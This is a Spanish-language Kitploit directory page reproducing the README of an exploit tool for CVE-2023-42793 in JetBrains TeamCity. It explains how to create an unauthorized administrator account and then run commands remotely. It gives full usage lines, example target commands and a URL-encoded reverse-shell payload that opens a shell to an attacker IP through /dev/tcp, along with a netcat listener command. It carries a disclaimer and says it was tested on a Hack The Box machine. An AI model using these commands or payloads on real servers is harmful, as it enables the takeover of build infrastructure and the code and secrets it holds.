Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-42793 — JetBrains TeamCity 2023.05.3 - Ejecución remota de código (RCE), CVE-2023-42793 | Kitploit
Herramientas/GitHubGitHub/b4l3ri0n/cve-2023-42793
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - Ejecución remota de código (RCE), CVE-2023-42793

Ver Repositorio
1133hace 2 añosAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-42793 - Creación de cuenta de administrador en TeamCity que lleva a RCE

usa primero exploit.py para crear una cuenta de administrador y luego usa rce.py para ejecutar comandos en el objetivo, y para reverse shell consulta esto

script de exploit

Descripción

Este script explota CVE-2023-42793 para crear una cuenta de administrador en un servidor TeamCity. Envía una solicitud POST a la URL objetivo para crear un usuario administrador con credenciales especificadas o aleatorias.

Uso

root@kitploit:~
python exploit.py -u <URL> [-v] [-n <USUARIO>] [-p <CONTRASEÑA>] [-e <EMAIL>]

Opciones

  • -u, --url URL: URL objetivo (requerido)
  • -v, --verbose: Activar modo verbose
  • -n, --username USUARIO: Especificar nombre de usuario (por defecto: aleatorio)
  • -p, --password CONTRASEÑA: Especificar contraseña (por defecto: aleatorio)
  • -e, --email EMAIL: Especificar email (por defecto: aleatorio)
  • -t, --token-file: Archivo para guardar el token

Prerrequisitos

  • Python 3.x
  • Librerías de Python
    • Para instalar las dependencias pip3 install -r requirements.txt

Ejemplos

  1. Explotar con nombre de usuario, contraseña y email aleatorios:

    root@kitploit:~
    python exploit.py -u http://target.com
    
  2. Explotar con nombre de usuario, contraseña y email especificados:

    root@kitploit:~
    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
    

Salida

Tras una explotación exitosa, el script imprime la URL, el nombre de usuario y la contraseña de la cuenta de administrador creada, y luego guarda la salida en el archivo de token.

Script de Ejecución Remota de Código (RCE)

Descripción

Este script permite ejecutar comandos en un servidor TeamCity vulnerable explotando CVE-2023-42793. Primero habilita los procesos de depuración y luego ejecuta el comando especificado usando los endpoints API apropiados.

Uso

root@kitploit:~
python rce_exploit.py -u <URL> [-v] [-c <COMANDO>] [-P <PUERTO>]

Opciones

  • -u, --url URL : URL objetivo (requerido)
  • -t, --token-file : Para especificar el archivo que contiene el token
  • -c, --command COMANDO: Especificar comando a ejecutar (RCE)
  • -P, --port PUERTO: Especificar puerto (por defecto es 80)

Ejemplo

Explotar con un comando especificado:

root@kitploit:~
python rce.py -u http://target.com -t token -c "whoami"

Para reverse shell

root@kitploit:~
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • En este comando para reverse shell reemplaza {IP} con tu IP y {port} con el puerto en el que estás escuchando
  • Crea un listener usando nc, por ej. nc -nvlp 5555
  • Para más consulta revshells

Notas

  • Este script ha sido probado en Runner.htb de hack the box
  • Este script es solo para fines educativos.
  • Úsalo de manera responsable y solo en sistemas que tengas autorización para probar.

Créditos

  • Zyad Elsayed
    • Repositorio de GitHub: Zyad-Elsayed
    • Cuenta de LinkedIn: zyad-abdelbary
  • Exploit original para cuenta de administrador: ByteHunter (Exploit-DB)

Recursos

  • Descripción de CVE-2023-42793: Descripción oficial de la vulnerabilidad CVE.
  • Entrada en Exploit Database: Código de exploit original en Exploit Database.
  • Blog de TeamCity: Entrada de blog discutiendo la vulnerabilidad CVE-2023-42793 en TeamCity.
  • Documentación de TeamCity: Documentación oficial de TeamCity.
Descargar herramienta